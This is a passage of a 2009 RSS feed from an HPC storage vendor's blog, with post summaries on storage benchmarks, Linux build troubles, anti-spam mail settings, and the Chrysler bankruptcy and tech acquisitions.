      <guid>https://blog.scalability.org/2009/05/apparently-we-aint-seen-nothin-yet/</guid>
      <description>You can hear lots of people talking over the last few weeks, how we are &amp;ldquo;bottoming out&amp;rdquo; in terms of the economy. Privately, I had wondered if this was merely a dead cat bounce. With oil now rapidly rising, articles are appearing that start to call into question the impact upon the economy. Turning what the authors hope to be nascent recoveries into what they predict to be additional (significant) declines.</description>
    </item>
    
    <item>
      <title>Ok, I got sick of the spam, changed the mailer back</title>
      <link>https://blog.scalability.org/2009/05/ok-i-got-sike-of-the-spam-changed-the-mailer-back/</link>
      <pubDate>Mon, 25 May 2009 23:58:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/ok-i-got-sike-of-the-spam-changed-the-mailer-back/</guid>
      <description>About a month ago, I altered our SMTP daemon to not be so picky about mail. Previous to this, I had turned on and tweaked many anti-spam things. One of my favorites so far has been spf. Turns out, that lots of mailers are incorrectly configured. That is being generous. Lots of mailers are on the internet, and not complying with RFCs, which makes it real hard to distinguish spam sources from real mailers.</description>
    </item>
    
    <item>
      <title>One target.pl to rule them all, and on the server, bind them</title>
      <link>https://blog.scalability.org/2009/05/one-targetpl-to-rule-them-all-and-on-the-server-bind-them/</link>
      <pubDate>Mon, 25 May 2009 17:35:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/one-targetpl-to-rule-them-all-and-on-the-server-bind-them/</guid>
      <description>Imagine if you will, a single consistent command line interface to setting up and managing file and block based IO targets. Well, we have this mostly operational now for NFS, and are working on the iSCSI, SRP, AoE, SMB, and a few other targets while we are at it. Targets are added via plugins which handle the workflow of setup/teardown, etc. This is the updated version of our API. And it is an integral part of our STorAge SHell, used for managing huge storage systems.</description>
    </item>
    
    <item>
      <title>An observation on the quality of the Perl build in Ubuntu 9.04</title>
      <link>https://blog.scalability.org/2009/05/an-observation-on-the-quality-of-the-perl-build-in-ubuntu-904/</link>
      <pubDate>Mon, 25 May 2009 17:16:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/an-observation-on-the-quality-of-the-perl-build-in-ubuntu-904/</guid>
      <description>I have long ago given up on the perl builds in Redhat and build-alikes. To call them broken is &amp;hellip; well &amp;hellip; to be unfair to things that are merely broken. The Redhat/Centos Perls are basically completely hosed, in part due to incorporating bad patch mixes, poor build Config options, etc. Some will claim that despite the broken-ness of the build, it is better to stick with this build, and not install updated/corrected modules via CPAN.</description>
    </item>
    
    <item>
      <title>I had to try this ...</title>
      <link>https://blog.scalability.org/2009/05/i-had-to-try-this/</link>
      <pubDate>Sat, 23 May 2009 03:41:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/i-had-to-try-this/</guid>
      <description>Yeah &amp;hellip; well &amp;hellip; At least it recognizes it could be humorous. Look at the bottom of the image &amp;hellip;</description>
    </item>
    
    <item>
      <title>A simple statement</title>
      <link>https://blog.scalability.org/2009/05/a-simple-statement/</link>
      <pubDate>Fri, 22 May 2009 02:16:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/a-simple-statement/</guid>
      <description>Yesterday, I got into a discussion with Sean Eddy at Janelia farms over the change in HMMer. Today I saw this online. Let me be clear. The name &amp;ldquo;HMMer&amp;rdquo; is Sean&amp;rsquo;s, and he can do with it what he wants. My concern was about something different, which we are going to adapt to. We are working to make sure we are correctly respecting his rights, while at the same time supporting users with a &amp;ldquo;business&amp;rdquo; case for using the existing code.</description>
    </item>
    
    <item>
      <title>Ugh: 12.9% and climbing</title>
      <link>https://blog.scalability.org/2009/05/ugh-129-and-climbing/</link>
      <pubDate>Thu, 21 May 2009 15:13:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/ugh-129-and-climbing/</guid>
      <description>While the rest of the nation deals with a persistent and painful recession, with associated job loss and business activity slowdown, Michigan pretty much leads the nation in unemployment. This is not a good thing to lead the nation in. Job production. That would be good. VC and capital investment. That would be good. Educational accomplishment and R&amp;amp;D dollars invested. That would be good. Unemployment? Not so much good.</description>
    </item>
    
    <item>
      <title>Short program last night on NPR about banks</title>
      <link>https://blog.scalability.org/2009/05/short-program-last-night-on-npr-about-banks/</link>
      <pubDate>Thu, 21 May 2009 12:44:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/short-program-last-night-on-npr-about-banks/</guid>
      <description>Our bank is one that failed its stress test, but just got another $13B by selling stock. Ok, we are being told the credit market is unfreezing. LIBOR is falling. Good. What does this mean for small businesses? Precisely squat.
Yup, you got it. Our credit market is frozen solid. The bank analysts admitted, on the radio program, that what the banks were doing was hoarding cash. The banks want to pay back TARP as soon as possible.</description>
    </item>
    
    <item>
      <title>Short article on the growth of accelerators in life science work</title>
      <link>https://blog.scalability.org/2009/05/short-article-on-the-growth-of-accelerators-in-life-science-work/</link>
      <pubDate>Tue, 19 May 2009 21:39:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/short-article-on-the-growth-of-accelerators-in-life-science-work/</guid>
      <description>I am quoted in there quite a bit. This is GenomeWeb magazine covering the many aspects of what is called Bio-IT. One of the massive problems around Bio-IT is moving data (go figure), storing data (again &amp;hellip;), and processing data. I&amp;rsquo;ve heard some people provide arguments as to why accelerators won&amp;rsquo;t play there &amp;hellip; and then I hear from people who have a limited time to get their work done, subject to an ever growing mound of data.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-05-19</title>
      <link>https://blog.scalability.org/2009/05/twitter-updates-for-2009-05-19/</link>
      <pubDate>Tue, 19 May 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/twitter-updates-for-2009-05-19/</guid>
      <description>* @[mndoci](http://twitter.com/mndoci) should we assume our friend &amp;quot;Chad&amp;quot; wasn&#39;t invited to that party ... ? Too bad we can&#39;t do that here ... [in reply to mndoci](http://twitter.com/mndoci/statuses/1830463079) [#](http://twitter.com/sijoe/statuses/1836024323)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>Doing a bit more performance testing on the big JR4</title>
      <link>https://blog.scalability.org/2009/05/doing-a-bit-more-performance-testing-on-the-big-jr4/</link>
      <pubDate>Mon, 18 May 2009 21:27:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/doing-a-bit-more-performance-testing-on-the-big-jr4/</guid>
      <description>[This was an older post from a few weeks ago, sitting in my queue. Cleared it out] Want to burn it in. Played with an experimental kernel, and found the Mellanox drivers wouldn&amp;rsquo;t build. Too many things have changed from 2.6.27 to 2.6.29.2. Ok, reloaded with Centos 5.3. Will stress test the default kernel. For some reason, we were hitting a strange SSD-RAID interaction, so I swapped out the SSD pair for a spinning rust pair.</description>
    </item>
    
    <item>
      <title>Chromium for Linux (Google Chrome for Linux)</title>
      <link>https://blog.scalability.org/2009/05/chromium-for-linux-google-chrome-for-linux/</link>
      <pubDate>Sun, 17 May 2009 16:22:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/chromium-for-linux-google-chrome-for-linux/</guid>
      <description>Technically, from a branding scenario, Chromium isn&amp;rsquo;t Chrome. Ignore that for a moment. Chromium is out for Linux. It is a new/alternative browser for Linux. It is much better than Firefox in terms of raw speed. And from the memory leaks I have seen in the latest FF, and the instability of the program (it&amp;rsquo;s a crap shoot as to whether it will load a page or not, not to mention all the rendering bugs) &amp;hellip; Chromium, in its current pre-alpha state, is a better browser than FF.</description>
    </item>
    
    <item>
      <title>What happens when economic development ... doesn&#39;t work?</title>
      <link>https://blog.scalability.org/2009/05/what-happens-when-economic-development-doesnt-work/</link>
      <pubDate>Sun, 17 May 2009 14:40:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/what-happens-when-economic-development-doesnt-work/</guid>
      <description>Interesting article in the Freep today. It points out that Michigan has shed about 700k jobs in a decade, while the MEDC has managed to create, or in more realistic terms, preserve, 43k jobs. That&amp;rsquo;s roughly 1 job created for every 16 lost. Understand that Michigan has been the home to the US auto industry, and in most cases, every other industry here has played, at best, a distant second fiddle to it from an economic and political clout view.</description>
    </item>
    
    <item>
      <title>and so it ends ...</title>
      <link>https://blog.scalability.org/2009/05/and-so-it-ends/</link>
      <pubDate>Thu, 14 May 2009 23:24:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/and-so-it-ends/</guid>
      <description>From Yahoo</description>
    </item>
    
    <item>
      <title>Took me long enough ... I finally fixed the certs!</title>
      <link>https://blog.scalability.org/2009/05/took-me-long-enough-i-finally-fixed-the-certs/</link>
      <pubDate>Thu, 14 May 2009 03:36:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/took-me-long-enough-i-finally-fixed-the-certs/</guid>
      <description>This was bad of me. For years, we&amp;rsquo;ve been using self signed certs for lots of things. I figured we wouldn&amp;rsquo;t host our own store, or do other things like that. Well, all that is going to change. The Amazon web-store is actually hard to use, and costs us too much. Not to mention the various restrictions they impose. So we are moving the store to our server. Look for the announcement soon.</description>
    </item>
    
    <item>
      <title>Microsoft raising large sums of cash ... for what?</title>
      <link>https://blog.scalability.org/2009/05/microsoft-raising-large-sums-of-cash-for-what/</link>
      <pubDate>Tue, 12 May 2009 22:47:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/microsoft-raising-large-sums-of-cash-for-what/</guid>
      <description>I&amp;rsquo;ve heard speculation of acquisitions. This would be the time for it. Valuations are down, and good companies can be had &amp;ldquo;on the cheap&amp;rdquo;. I&amp;rsquo;ve heard someone mention EMC as a target. Somehow &amp;hellip; well &amp;hellip; I don&amp;rsquo;t think so. Doesn&amp;rsquo;t seem like a good fit. I have a very odd sense of what a &amp;ldquo;good&amp;rdquo; fit would be. I am sure lots of folks will disagree. But it would solve many problems for Microsoft, right away.</description>
    </item>
    
    <item>
      <title>The future of the HPC market ... is it growing or shrinking?</title>
      <link>https://blog.scalability.org/2009/05/the-future-of-the-hpc-market-is-it-growing-or-shrinking/</link>
      <pubDate>Tue, 12 May 2009 04:42:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/the-future-of-the-hpc-market-is-it-growing-or-shrinking/</guid>
      <description>HPC as a market, is under stress, and will continue to be for a while. The Inquirer has an interesting article saying very similar things to what I have been saying for a while about the market. It is a very good read. I&amp;rsquo;ve been saying for years &amp;hellip; no &amp;hellip; decades now &amp;hellip; about 15 years to be frank, that HPC has been moving relentlessly downmarket. Each wave of its motion has a destructive impact upon the old order, and opens up the market wider to more people.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-05-10</title>
      <link>https://blog.scalability.org/2009/05/twitter-updates-for-2009-05-10/</link>
      <pubDate>Sun, 10 May 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/twitter-updates-for-2009-05-10/</guid>
      <description>* thinking about work  must solve a driver issue do this on monday # * ok, that was an attempt at a haiku &amp;hellip; there is an implied newline after &amp;lsquo;work&amp;rsquo;, and &amp;lsquo;issue&amp;rsquo;. Maybe we need twitter-ku #
Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>Some Sun shareholders are apparently pissed off at the deal ...</title>
      <link>https://blog.scalability.org/2009/05/some-sun-shareholders-are-apparently-pissed-off-at-the-deal/</link>
      <pubDate>Sat, 09 May 2009 20:41:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/some-sun-shareholders-are-apparently-pissed-off-at-the-deal/</guid>
      <description>From Computerworld:
Hmmm&amp;hellip; Breach of fiduciary duty? By board members? Nah &amp;hellip; couldn&amp;rsquo;t happen &amp;hellip; (yes, I am being sarcastic).
But these shareholders allege that the price was too low. I have to disagree with this. The market suggested a significantly lower price than Oracle paid. It&amp;rsquo;s probably not worth pushing that point too hard; just let Sun go gentle into that good night. Put another way, stop looking at this gift horse too closely.</description>
    </item>
    
    <item>
      <title>side stepping landmines</title>
      <link>https://blog.scalability.org/2009/05/side-stepping-landmines/</link>
      <pubDate>Fri, 08 May 2009 11:52:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/side-stepping-landmines/</guid>
      <description>We run into some interesting things as a business. We have a good set of products showing best in class performance, and price performance, not to mention expansion capabilities and localized computing power. We have partners and resellers. We resell some of their product, providing feedback on opportunities, why we win or lose, and resellers, some of whom do the same for us.
We try to stay out of non-differentiable markets.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-05-08</title>
      <link>https://blog.scalability.org/2009/05/twitter-updates-for-2009-05-08/</link>
      <pubDate>Fri, 08 May 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/twitter-updates-for-2009-05-08/</guid>
      <description>* Mmmm nice shiny reboot button ... mmm wanna press it .... mmm .... oops ... there goes an hour of work ... (DOH!!!!) [#](http://twitter.com/sijoe/statuses/1729615374) * loading a customers system, over the network, from an iso image, on my laptop. 800 miles away from them. [#](http://twitter.com/sijoe/statuses/1729635255)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>Happiness is ... a JR4 tearing through an octobonnie ...</title>
      <link>https://blog.scalability.org/2009/05/happiness-is-a-jr4-tearing-through-an-octobonnie/</link>
      <pubDate>Thu, 07 May 2009 02:28:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/happiness-is-a-jr4-tearing-through-an-octobonnie/</guid>
      <description>This is a very stressful benchmark for a server. A single bonnie++ run can generate user loads of 3-5 depending upon system configuration. And bonnie++ wants &amp;hellip; no &amp;hellip; insists on using 2x RAM per run. So even if you run 8 at a time &amp;hellip; and have, let&amp;rsquo;s say &amp;hellip; I dunno &amp;hellip; 128 GB RAM &amp;hellip; 2x RAM is 256GB. 8 of these is about 2TB of space. Sure enough &amp;hellip;</description>
    </item>
    
    <item>
      <title>that udev issue?  Self-inflicted...</title>
      <link>https://blog.scalability.org/2009/05/that-udev-issue-self-inflicted/</link>
      <pubDate>Wed, 06 May 2009 03:50:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/that-udev-issue-self-inflicted/</guid>
      <description>I might have a point about udev. A reasonable point. But the problem appears to be one or the other of the packages we installed. I retried it on my sacrificial machine here at home. No IB cards, but I was able to boot our stable kernel after installing the Mellanox OFED. I&amp;rsquo;d prefer to use our OFED build, and it looks like I&amp;rsquo;ll be able to do that. By self-inflicted I mean that I ran the installer script one too many times.</description>
    </item>
    
    <item>
      <title>Its over ... including the shouting</title>
      <link>https://blog.scalability.org/2009/05/its-over-including-the-shouting/</link>
      <pubDate>Wed, 06 May 2009 03:43:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/its-over-including-the-shouting/</guid>
      <description>SCO&amp;rsquo;s chapter 11 looks like it will be turned into a chapter 7 liquidation. Litigation is rarely a rational business plan. You actually have to own assets that other people have purloined. If you don&amp;rsquo;t own the assets, and others haven&amp;rsquo;t stolen the assets you don&amp;rsquo;t own &amp;hellip; it&amp;rsquo;s a little harder to claim you have been done wrong. Look for the assets they do own to be auctioned off to pay creditors.</description>
    </item>
    
    <item>
      <title>Confirmation of earlier post info ... I had hoped it was untrue ...</title>
      <link>https://blog.scalability.org/2009/05/confirmation-of-earlier-post-info-i-had-hoped-it-was-untrue/</link>
      <pubDate>Tue, 05 May 2009 20:41:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/confirmation-of-earlier-post-info-i-had-hoped-it-was-untrue/</guid>
      <description>This link pretty much covers it.
This is a bankruptcy, an ordered re-ordering of a company. It is a well practiced procedure. Everyone will get hurt, though the non-secured creditors, by law, will get hurt worse, and the equity holders are basically wiped out. This is the way things go. Except for Chrysler. Where very specific non-secured creditors are actually getting ahead, and secured creditors are getting something else. Ouch. Rumor had it that HP had given Chrysler a sweetheart deal on their last cluster.</description>
    </item>
    
    <item>
      <title>Udev should never, ever hang</title>
      <link>https://blog.scalability.org/2009/05/udev-should-never-ever-hang/</link>
      <pubDate>Tue, 05 May 2009 18:17:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/udev-should-never-ever-hang/</guid>
      <description>Udev is a /dev population tool. It enables devices to be hotplugged, and it adapts the system to the changes by running commands and scripts. Udev runs upon reboot. And in the background, courtesy of libevent, it handles changes as they occur. Except, every now and then, something goes awry with udev. Like it hangs. So booting stops. Cold. With no way around it. Sort of our BSOD. Just as inconvenient. What you can do about it is fairly interesting.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-05-04</title>
      <link>https://blog.scalability.org/2009/05/twitter-updates-for-2009-05-04/</link>
      <pubDate>Mon, 04 May 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/twitter-updates-for-2009-05-04/</guid>
      <description>* Burning in a 128GB 16 core JR for a customer. Getting 1.7 GB/s sustained large block reads, 1.4 GB/s sustained large block writes [#](http://twitter.com/sijoe/statuses/1691205092)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>It didn&#39;t take long for this to descend into a mess</title>
      <link>https://blog.scalability.org/2009/05/it-didnt-take-long-for-this-to-descend-into-a-mess/</link>
      <pubDate>Sun, 03 May 2009 22:57:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/it-didnt-take-long-for-this-to-descend-into-a-mess/</guid>
      <description>I had mentioned Chrysler&amp;rsquo;s bankruptcy previously. What was being reported, whereby the unsecured creditors were making out much better than the secured creditors, simply didn&amp;rsquo;t strike me as making sense. I thought the secured creditors would simply say no, and force the issue in court. Which appears to be what they are doing. The only &amp;ldquo;winners&amp;rdquo; if you can call them that, are the unions, who, as unsecured creditors, wound up with 55% of the company.</description>
    </item>
    
    <item>
      <title>The aftermath of the smallest of the big 3 going bang</title>
      <link>https://blog.scalability.org/2009/05/the-aftermath-of-the-smallest-of-the-big-3-going-bang/</link>
      <pubDate>Fri, 01 May 2009 12:39:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/the-aftermath-of-the-smallest-of-the-big-3-going-bang/</guid>
      <description>It&amp;rsquo;s the day after. Detroit has had a 20+% unemployment rate for a while, exacerbated by many factors. It would be fair and accurate to state that the city has been in a depression for a while. Well, the little &amp;ldquo;surgical&amp;rdquo; bankruptcy is having the ripple effects we knew it would. And it will likely take down several additional companies with it, that were under pressure, but not in terrible shape.</description>
    </item>
    
    <item>
      <title>... and Chrysler goes &#34;bang&#34;</title>
      <link>https://blog.scalability.org/2009/04/and-chrysler-goes-bang/</link>
      <pubDate>Thu, 30 Apr 2009 17:05:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/and-chrysler-goes-bang/</guid>
      <description>Chapter 11 filing today. Seems that the administration is thinking this will be a fast process. I think the creditors think otherwise. Chrysler may be worth more to them in a Chapter 7 liquidation than a Chapter 11 and section 363 scenario. What does this mean to HPC? Potentially lots. Chrysler, and all of its suppliers and partners use quite a bit of HPC. Keeps costs down. If they emerge, I expect them to use even more HPC.</description>
    </item>
    
    <item>
      <title>Raw unabashed I/O firepower</title>
      <link>https://blog.scalability.org/2009/04/raw-unabashed-io-firepower/</link>
      <pubDate>Thu, 30 Apr 2009 15:00:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/raw-unabashed-io-firepower/</guid>
      <description>I hit Ctrl-C while testing &amp;hellip; the streaming write
root@jr4:~# dd if=/dev/zero of=/data/big.file bs=16M count=20k oflag=direct ^C15081+0 records in 15081+0 records out 253017194496 bytes (253 GB) copied, 186.973 s, 1.4 GB/s  &amp;hellip; and the streaming read
root@jr4:~# dd if=/data/big.file of=/dev/null bs=16M iflag=direct 10240+0 records in 10240+0 records out 171798691840 bytes (172 GB) copied, 99.0592 s, 1.7 GB/s  Quite nice.</description>
    </item>
    
    <item>
      <title>New JackRabbit being built ...</title>
      <link>https://blog.scalability.org/2009/04/new-jackrabbit-being-built/</link>
      <pubDate>Wed, 29 Apr 2009 16:57:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/new-jackrabbit-being-built/</guid>
      <description>This one has a nice top output &amp;hellip;
top - 13:36:58 up 7 min, 3 users, load average: 0.03, 0.04, 0.00
Tasks: 196 total, 1 running, 195 sleeping, 0 stopped, 0 zombie
Cpu0 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Cpu1 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Cpu2 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Cpu3 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Cpu4 : 0.</description>
    </item>
    
    <item>
      <title>Wisdom from Down-Under</title>
      <link>https://blog.scalability.org/2009/04/wisdom-from-down-under/</link>
      <pubDate>Wed, 29 Apr 2009 11:42:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/wisdom-from-down-under/</guid>
      <description>Found this, this morning. As the US and the rest of the world take defibrillator paddles to the economy, and we hear mutterings of class warfare, it is interesting to hear similar sentiments expressed &amp;hellip; globally &amp;hellip; by the people doing the actual job creating. This link is the full story. Good read. I don&amp;rsquo;t have the nice car (I have a 13 year old Jeep), or the huge house. Still in growth mode.</description>
    </item>
    
    <item>
      <title>Day job news</title>
      <link>https://blog.scalability.org/2009/04/day-job-news/</link>
      <pubDate>Tue, 28 Apr 2009 18:13:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/day-job-news/</guid>
      <description>Nope, haven&amp;rsquo;t been acquired. There is a lot of that going around though (and in some cases, rollups can do good in this market). We are now officially a Cray CX1 reseller (woot!!!) Since my SGI days, I&amp;rsquo;ve really enjoyed working with my Crayon colleagues. The funny thing is that many of the faces are the same. CX1 is a neat product, fits in well with what lots of our customers are doing.</description>
    </item>
    
    <item>
      <title>Highly non-optimally tuned ΔV3 on a simple streaming test</title>
      <link>https://blog.scalability.org/2009/04/highly-non-optimally-tuned-v3-on-a-simple-streaming-test/</link>
      <pubDate>Tue, 28 Apr 2009 17:05:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/highly-non-optimally-tuned-v3-on-a-simple-streaming-test/</guid>
      <description>Yowza &amp;hellip;
[root@dv3-of coreutils-7.2]# /opt/scalable/bin/dd if=/mnt/data/filesys1/xfs/t/big.file of=/dev/null bs=16M iflag=direct 807+0 records in 807+0 records out 13539213312 bytes (14 GB) copied, 13.2268 s, 1.0 GB/s  Unit has 8 GB ram.
Streaming writes are a bit slower (and direct IO not nearly as efficient for this RAID6).
[root@dv3-of coreutils-7.2]# /opt/scalable/bin/dd if=/dev/zero of=/mnt/data/filesys1/xfs/t/big.file bs=16M count=2k 2048+0 records in 2048+0 records out 34359738368 bytes (34 GB) copied, 82.3577 s, 417 MB/s  For laughs, let&amp;rsquo;s re-read that 34 GB I just wrote out.</description>
    </item>
    
    <item>
      <title>3ware acquired by LSI</title>
      <link>https://blog.scalability.org/2009/04/3ware-acquired-by-lsi/</link>
      <pubDate>Sun, 26 Apr 2009 23:44:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/3ware-acquired-by-lsi/</guid>
      <description>AMCC looks like they sold their 3ware raid bits to LSI on the 21st of April. 3ware is one of the major lower end RAID suppliers out there. They have a volume business, but like everyone, I suspect AMCC was falling on hard times, and needed to monetize its purchase of 3ware. What does this mean? Probably more consolidation in the storage market. 3ware built its own storage processors. LSI makes storage processors.</description>
    </item>
    
    <item>
      <title>The magical incantation to make rPath linux enable compilation ... about 1/2 way to where we need to be</title>
      <link>https://blog.scalability.org/2009/04/the-magical-incantation-to-make-rpath-linux-enable-compilation-about-12-way-to-where-we-need-to-be/</link>
      <pubDate>Sun, 26 Apr 2009 15:31:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/the-magical-incantation-to-make-rpath-linux-enable-compilation-about-12-way-to-where-we-need-to-be/</guid>
      <description>I have been quite critical of rPath. I believe rightly so. They make life far too hard for people who need to build code or kernel modules to live patch a system. The documentation for doing this stuff &amp;hellip; really doesn&amp;rsquo;t exist. You are, frankly, on your own. So I have spent hours trying to figure this out. And finally, I came across the method to get builds to work.
[root@dv3-of arcmsr]# conary update glibc:devel Including extra troves to resolve dependencies: glibc:devellib=2.</description>
    </item>
    
    <item>
      <title>A plan to work around the rPath issues in OpenFiler</title>
      <link>https://blog.scalability.org/2009/04/a-plan-to-work-around-the-rpath-issues-in-openfiler/</link>
      <pubDate>Sat, 25 Apr 2009 11:06:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/a-plan-to-work-around-the-rpath-issues-in-openfiler/</guid>
      <description>So I was thinking about how to work around the issues I found in OpenFiler. Basically the inability to upgrade drivers is the critical issue. Well, if OpenFiler never touches the hardware, this is much less of an issue. Bear with me.
Basically, we sell JackRabbit as a server or an appliance, and pre-configure it so that our customers can pull it out of the box, stick it into the rack or on the floor, turn it on, and start working.</description>
    </item>
    
    <item>
      <title>Cloudy issues</title>
      <link>https://blog.scalability.org/2009/04/cloudy-issues/</link>
      <pubDate>Sat, 25 Apr 2009 03:04:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/cloudy-issues/</guid>
      <description>I need to get this out first and foremost. I do believe that cloud computing or similar is inevitable. It is coming. I am also a realist. I know perfectly well that there are some fairly significant impediments to it. The impediments are a mixture of technological deployment, and business models. It&amp;rsquo;s not impossible to do this given sufficient money. But some of the dependencies are simply too pricey to enable rapid cloud adoption, and I don&amp;rsquo;t see this changing rapidly in the near term (next 3 years).</description>
    </item>
    
    <item>
      <title>Detroit:  Where the weak are killed and eaten</title>
      <link>https://blog.scalability.org/2009/04/detroit-where-the-weak-are-killed-and-eaten/</link>
      <pubDate>Sat, 25 Apr 2009 01:03:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/detroit-where-the-weak-are-killed-and-eaten/</guid>
      <description>Way back in graduate school, my family was in town for my wedding. Back then, Detroit had a reputation &amp;hellip; not a pretty one &amp;hellip; for being the murder capital of the US. Sure made my folks happy I was going to grad school there. So while we were wandering around in Greektown right after a meal, we spent some time in Trappers alley, at a number of stores. One of the stores had a T-Shirt my older brother really seemed to enjoy.</description>
    </item>
    
    <item>
      <title>Acquisition day T &#43; 5: We learn more</title>
      <link>https://blog.scalability.org/2009/04/acquisition-day-t-5-we-learn-more/</link>
      <pubDate>Fri, 24 Apr 2009 23:40:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/acquisition-day-t-5-we-learn-more/</guid>
      <description>Ok, looks like I was dead on right on some aspects, and likely pie in the sky with others. Here is where I was right. This acquisition was, and is, about Java and MySQL. From The Register yesterday:
Yup. Makes sense.
But also stated &amp;hellip;
&amp;hellip; which they have to do to prevent Sun&amp;rsquo;s hardware sales from tanking pre-close. We know this. And they are going to keep making these noises up until the close.</description>
    </item>
    
    <item>
      <title>Great concept, terrible implementation</title>
      <link>https://blog.scalability.org/2009/04/great-concept-terrible-implementation/</link>
      <pubDate>Fri, 24 Apr 2009 20:31:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/great-concept-terrible-implementation/</guid>
      <description>I&amp;rsquo;ve mentioned rPath before, as it is the basis for OpenFiler, and other appliances. Now with the mad headlong rush into the misty vapors of cloud computing, they are rebranding as a cloud appliance provider. Their concept is great. Create a functional software appliance, run it everywhere. That&amp;rsquo;s not what I am going to complain about. It&amp;rsquo;s about the implementation. [rant mode full on] It&amp;rsquo;s always about the implementation. As the implementation is the thing that drives support.</description>
    </item>
    
    <item>
      <title>Amusing story of the day:  yes, someone has tried to scam us</title>
      <link>https://blog.scalability.org/2009/04/amusing-story-of-the-day-yes-someone-has-tried-to-scam-us/</link>
      <pubDate>Fri, 24 Apr 2009 18:55:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/amusing-story-of-the-day-yes-someone-has-tried-to-scam-us/</guid>
      <description>So there I am waiting for my 3:30pm phone call. Working on a Delta-V for a partner. Get a call from the number 5618260072. Remember that number. This person claimed they were representing Hugh Downs production company and wanted to do a story. Obviously this person had no clue, was reading from a script, and didn&amp;rsquo;t have any research background on us. I was at least amused. One of their questions at the end got me thinking that this person wasn&amp;rsquo;t clueless, but was fishing for something.</description>
    </item>
    
    <item>
      <title>The bell may toll for Chrysler ... next week</title>
      <link>https://blog.scalability.org/2009/04/the-bell-may-toll-for-chrysler-next-week/</link>
      <pubDate>Thu, 23 Apr 2009 21:58:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/the-bell-may-toll-for-chrysler-next-week/</guid>
      <description>From theNYT, we learn that they are being pushed to a Chapter 11 filing. This is needed, in order to cause a break on some of the really bad contracts and other business elements they have agreed to over the years. Chrysler is a consumer of HPC products. Rumor has it a large (effectively free/risk free) cluster was provided by one of the tier 1s in the last few months. Chrysler has been hammered by the economic downturn, and the effective absence of credit in the market.</description>
    </item>
    
    <item>
      <title>96TB JR5 now available</title>
      <link>https://blog.scalability.org/2009/04/96tb-jr5-now-available/</link>
      <pubDate>Wed, 22 Apr 2009 20:23:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/96tb-jr5-now-available/</guid>
      <description>96TB raw capacity, 5U high performance storage system with 64GB ram, 8 processor cores, 4x GbE, 2x 10GbE ports, dual hardware accelerated RAID cards, SSD boot drives. For well under $1000/TB. More information coming in the formal announcement this week.</description>
    </item>
    
    <item>
      <title>Acquisition T &#43; 1 day:</title>
      <link>https://blog.scalability.org/2009/04/acquisition-t-1-day/</link>
      <pubDate>Tue, 21 Apr 2009 12:19:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/acquisition-t-1-day/</guid>
